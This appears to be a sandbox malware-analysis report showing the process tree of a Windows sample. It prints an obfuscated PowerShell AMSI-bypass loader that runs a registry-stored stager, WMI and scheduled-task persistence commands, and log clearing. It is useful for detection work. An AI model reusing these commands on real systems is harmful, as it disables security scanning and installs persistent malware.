PID 4560 wrote to memory of 5084	4560	f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe	90
PID 5084 wrote to memory of 4440	5084	cmd.exe	92
PID 5084 wrote to memory of 4440	5084	cmd.exe	92
PID 5084 wrote to memory of 4440	5084	cmd.exe	92
PID 5084 wrote to memory of 2344	5084	cmd.exe	101
PID 5084 wrote to memory of 2344	5084	cmd.exe	101
PID 5084 wrote to memory of 2344	5084	cmd.exe	101
PID 3968 wrote to memory of 648	3968	fuaciw.exe	107
PID 3968 wrote to memory of 648	3968	fuaciw.exe	107
PID 3968 wrote to memory of 648	3968	fuaciw.exe	107
PID 1880 wrote to memory of 5068	1880	powershell.EXE	112
PID 1880 wrote to memory of 5068	1880	powershell.EXE	112
PID 1880 wrote to memory of 5068	1880	powershell.EXE	112
PID 1880 wrote to memory of 5068	1880	powershell.EXE	112
PID 1880 wrote to memory of 5068	1880	powershell.EXE	112
PID 1880 wrote to memory of 5068	1880	powershell.EXE	112
PID 1880 wrote to memory of 5068	1880	powershell.EXE	112
PID 1880 wrote to memory of 5068	1880	powershell.EXE	112
PID 1880 wrote to memory of 5068	1880	powershell.EXE	112
PID 1880 wrote to memory of 5068	1880	powershell.EXE	112
PID 1880 wrote to memory of 5068	1880	powershell.EXE	112
PID 5068 wrote to memory of 600	5068	dllhost.exe	5
PID 5068 wrote to memory of 684	5068	dllhost.exe	7
PID 5068 wrote to memory of 960	5068	dllhost.exe	12
PID 5068 wrote to memory of 376	5068	dllhost.exe	13
PID 5068 wrote to memory of 768	5068	dllhost.exe	14
PID 5068 wrote to memory of 1044	5068	dllhost.exe	15
PID 5068 wrote to memory of 1088	5068	dllhost.exe	17
PID 5068 wrote to memory of 1104	5068	dllhost.exe	18
PID 5068 wrote to memory of 1160	5068	dllhost.exe	19
PID 5068 wrote to memory of 1232	5068	dllhost.exe	20
PID 5068 wrote to memory of 1288	5068	dllhost.exe	21
PID 5068 wrote to memory of 1336	5068	dllhost.exe	22
PID 5068 wrote to memory of 1348	5068	dllhost.exe	23
PID 5068 wrote to memory of 1440	5068	dllhost.exe	24
PID 5068 wrote to memory of 1508	5068	dllhost.exe	25
PID 5068 wrote to memory of 1528	5068	dllhost.exe	26
PID 5068 wrote to memory of 1536	5068	dllhost.exe	27
PID 5068 wrote to memory of 1692	5068	dllhost.exe	28
PID 5068 wrote to memory of 1704	5068	dllhost.exe	29
PID 5068 wrote to memory of 1776	5068	dllhost.exe	30
PID 5068 wrote to memory of 1792	5068	dllhost.exe	31
PID 5068 wrote to memory of 1872	5068	dllhost.exe	32
PID 5068 wrote to memory of 2020	5068	dllhost.exe	33
PID 5068 wrote to memory of 2036	5068	dllhost.exe	34
PID 5068 wrote to memory of 1152	5068	dllhost.exe	35
PID 5068 wrote to memory of 1752	5068	dllhost.exe	36
PID 5068 wrote to memory of 2084	5068	dllhost.exe	37
PID 5068 wrote to memory of 2100	5068	dllhost.exe	38
PID 5068 wrote to memory of 2196	5068	dllhost.exe	40
PID 5068 wrote to memory of 2336	5068	dllhost.exe	41
PID 5068 wrote to memory of 2508	5068	dllhost.exe	42
PID 5068 wrote to memory of 2512	5068	dllhost.exe	43
PID 5068 wrote to memory of 2644	5068	dllhost.exe	44
PID 5068 wrote to memory of 2668	5068	dllhost.exe	45
PID 5068 wrote to memory of 2696	5068	dllhost.exe	46
PID 5068 wrote to memory of 2708	5068	dllhost.exe	47
PID 5068 wrote to memory of 2728	5068	dllhost.exe	48
PID 5068 wrote to memory of 2912	5068	dllhost.exe	49
PID 5068 wrote to memory of 2996	5068	dllhost.exe	50
PID 5068 wrote to memory of 3056	5068	dllhost.exe	51
PID 5068 wrote to memory of 3100	5068	dllhost.exe	52

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:600
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:376
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{97a019ab-a321-4129-984c-e67db5946032}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5068
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{59901b97-3142-4631-b9a5-79e1a2030296}
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5920

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1160
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3100
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:SqimOuNehwfd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$AHrdroApfQNEQf,[Parameter(Position=1)][Type]$yNiDGMTFEg)$DSBCBotsTBN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$DSBCBotsTBN.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$AHrdroApfQNEQf).SetImplementationFlags('Runtime,Managed');$DSBCBotsTBN.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$yNiDGMTFEg,$AHrdroApfQNEQf).SetImplementationFlags('Runtime,Managed');Write-Output $DSBCBotsTBN.CreateType();}$syKWSWZROnnEo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$vfsrrvUYHWXGCR=$syKWSWZROnnEo.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$AYydojzasHqEoafvQbq=SqimOuNehwfd @([String])([IntPtr]);$EtFvxkKAtYIsagqsqZCJyh=SqimOuNehwfd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PikCghBCfQx=$syKWSWZROnnEo.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MyEGhGwHDYrQsk=$vfsrrvUYHWXGCR.Invoke($Null,@([Object]$PikCghBCfQx,[Object]('Load'+'LibraryA')));$sYaqJBlShdiSvMIbJ=$vfsrrvUYHWXGCR.Invoke($Null,@([Object]$PikCghBCfQx,[Object]('Vir'+'tual'+'Pro'+'tect')));$JGNCVVy=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MyEGhGwHDYrQsk,$AYydojzasHqEoafvQbq).Invoke('a'+'m'+'si.dll');$zOOLiwVQhvyorOaLJ=$vfsrrvUYHWXGCR.Invoke($Null,@([Object]$JGNCVVy,[Object]('Ams'+'iSc'+'an'+'Buffer')));$fIRnpHJvaj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sYaqJBlShdiSvMIbJ,$EtFvxkKAtYIsagqsqZCJyh).Invoke($zOOLiwVQhvyorOaLJ,[uint32]8,4,[ref]$fIRnpHJvaj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$zOOLiwVQhvyorOaLJ,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sYaqJBlShdiSvMIbJ,$EtFvxkKAtYIsagqsqZCJyh).Invoke($zOOLiwVQhvyorOaLJ,[uint32]8,0x20,[ref]$fIRnpHJvaj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$ulzffmfbstager')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:800
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mtBjtACHaRlZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OeHFgRaANbSFGn,[Parameter(Position=1)][Type]$GwvpOFDsOk)$VgpnREJrgut=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$VgpnREJrgut.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$OeHFgRaANbSFGn).SetImplementationFlags('Runtime,Managed');$VgpnREJrgut.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$GwvpOFDsOk,$OeHFgRaANbSFGn).SetImplementationFlags('Runtime,Managed');Write-Output $VgpnREJrgut.CreateType();}$EyGgjKjDFIqqE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$VxZhnckMZLeLfX=$EyGgjKjDFIqqE.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xlnbVJQujeLXdopGefr=mtBjtACHaRlZ @([String])([IntPtr]);$KpcPsveayHkHLuxcMniEkw=mtBjtACHaRlZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OrTWoRESDkL=$EyGgjKjDFIqqE.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$bFCuleJsoRhbwt=$VxZhnckMZLeLfX.Invoke($Null,@([Object]$OrTWoRESDkL,[Object]('Load'+'LibraryA')));$JedrepmsDsqqvZHey=$VxZhnckMZLeLfX.Invoke($Null,@([Object]$OrTWoRESDkL,[Object]('Vir'+'tual'+'Pro'+'tect')));$VijPGFe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bFCuleJsoRhbwt,$xlnbVJQujeLXdopGefr).Invoke('a'+'m'+'si.dll');$lgcTnlKRRtGCCnjxM=$VxZhnckMZLeLfX.Invoke($Null,@([Object]$VijPGFe,[Object]('Ams'+'iSc'+'an'+'Buffer')));$zdfgQIpyzq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JedrepmsDsqqvZHey,$KpcPsveayHkHLuxcMniEkw).Invoke($lgcTnlKRRtGCCnjxM,[uint32]8,4,[ref]$zdfgQIpyzq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$lgcTnlKRRtGCCnjxM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JedrepmsDsqqvZHey,$KpcPsveayHkHLuxcMniEkw).Invoke($lgcTnlKRRtGCCnjxM,[uint32]8,0x20,[ref]$zdfgQIpyzq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$ulzffmfbstager')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1508
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2020

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1752

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2728

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3364

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3460
- C:\Users\Admin\AppData\Local\Temp\f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe
  "C:\Users\Admin\AppData\Local\Temp\f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe"
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4560
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ping 127.0.0.1 -n 5 & Start c:\windows\fonts\dlzcj\fuaciw.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:5084
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 5
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4440
  - - \??\c:\windows\fonts\dlzcj\fuaciw.exe
      c:\windows\fonts\dlzcj\fuaciw.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3556

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3772

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3928

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4132

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2548

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2544

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1260

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2328

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:5032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
PID:2456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=127.0.6533.89 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=127.0.2651.86 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff85c6cd198,0x7ff85c6cd1a4,0x7ff85c6cd1b0
  2⤵
  PID:3672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1820,i,11708048364682646792,608099842549576907,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:3
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4376,i,11708048364682646792,608099842549576907,262144 --variations-seed-version --mojo-platform-channel-handle=4152 /prefetch:8
  2⤵
  PID:3616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:5100

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3288

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:1484

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:3480

\??\c:\windows\fonts\dlzcj\fuaciw.exe
c:\windows\fonts\dlzcj\fuaciw.exe
1⤵
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3968
- C:\Windows\TEMP\qdomdxzh\czmpeh.exe
  C:\Windows\TEMP\qdomdxzh\czmpeh.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="pxpajzoj" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="auuarqmj" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='pxpajzoj'" DELETE
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4584
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:648
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="pxpajzoj" DELETE
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1028
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="auuarqmj" DELETE
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1480
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='pxpajzoj'" DELETE
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="pxpajzoj", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="auuarqmj",CommandLineTemplate="c:\windows\ime\iwmogqr\ogfrlvb.exe" & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="pxpajzoj"", Consumer="CommandLineEventConsumer.Name="auuarqmj""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1168
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:5132
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="pxpajzoj", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5252
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="auuarqmj",CommandLineTemplate="c:\windows\ime\iwmogqr\ogfrlvb.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5732
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="pxpajzoj"", Consumer="CommandLineEventConsumer.Name="auuarqmj""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks /DELETE /TN efnqlspo /F
  2⤵
  - Indicator Removal: Clear Persistence
  - System Location Discovery: System Language Discovery
  PID:400
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:112
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /TN efnqlspo /F
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 30 /tn "efnqlspo" /ru system /tr "c:\windows\ime\iwmogqr\ogfrlvb.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4796
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1824
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 30 /tn "efnqlspo" /ru system /tr "c:\windows\ime\iwmogqr\ogfrlvb.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3428
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cmd /c powercfg -import c:\windows\fonts\dlzcj\BestPower.pow
  2⤵
  - Power Settings
  - System Location Discovery: System Language Discovery
  PID:752
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4900
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powercfg -import c:\windows\fonts\dlzcj\BestPower.pow
    3⤵
    - Power Settings
    - System Location Discovery: System Language Discovery
    PID:1192
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg -import c:\windows\fonts\dlzcj\BestPower.pow
      4⤵
      Power Settings
      System Location Discovery: System Language Discovery
      PID:5144
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cmd /c powercfg -setactive 9e9eb98c-e0cd-4811-b59a-0f9b75ed1d1a
  2⤵
  - Power Settings
  PID:5588
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\WerFault.exe
